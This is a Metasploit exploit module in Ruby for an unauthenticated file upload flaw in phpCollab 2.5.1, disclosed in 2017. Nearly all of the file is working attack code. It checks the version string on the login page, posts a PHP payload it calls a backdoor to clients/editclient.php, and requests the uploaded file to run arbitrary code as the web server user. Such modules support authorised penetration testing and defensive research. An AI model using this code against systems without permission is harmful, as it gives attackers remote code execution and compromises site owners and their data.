metasploit-framework/modules/exploits/unix/webapp/phpcollab_upload_exec.rb

93 lines
2.7 KiB
Ruby

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'phpCollab 2.5.1 Unauthenticated File Upload Vulnerability',
'Description' => %q{
This module exploits a file upload vulnerability in phpCollab 2.5.1
which could be abused to allow unauthenticated users to execute arbitrary code
under the context of the web server user.
The exploit has been tested on Ubuntu 16.04.3 64-bit
},
'Author' =>
[
'Nicolas SERRA <n.serra[at]sysdream.com>', # Vulnerability discovery
'Nick Marcoccio "1oopho1e" <iremembermodems[at]gmail.com>', # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://www.exploit-db.com/exploits/42934/' ],
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'DisableNops' => true
},
'Targets' => [ ['Automatic', {}] ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 29 2017'
))
register_options(
[
OptString.new('TARGETURI', [ true, "Installed path of phpCollab ", "/phpcollab/"])
])
end
def check
url = normalize_uri(target_uri.path, "general/login.php?msg=logout")
res = send_request_cgi(
'method' => 'GET',
'uri' => url
)
if res && res.body.include?('PhpCollab v2.5.1')
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
filename = '1.php'
register_file_for_cleanup(filename)
data = Rex::MIME::Message.new
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload\"; filename=\"#{filename}\"")
print_status("Uploading backdoor file: #{filename}")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "clients/editclient.php?id=1&action=update"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
if res && res.code == 302
print_good("Backdoor successfully created.")
else
fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
end
print_status("Trigging the exploit...")
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "logos_clients/1.php")
}, 5)
end
end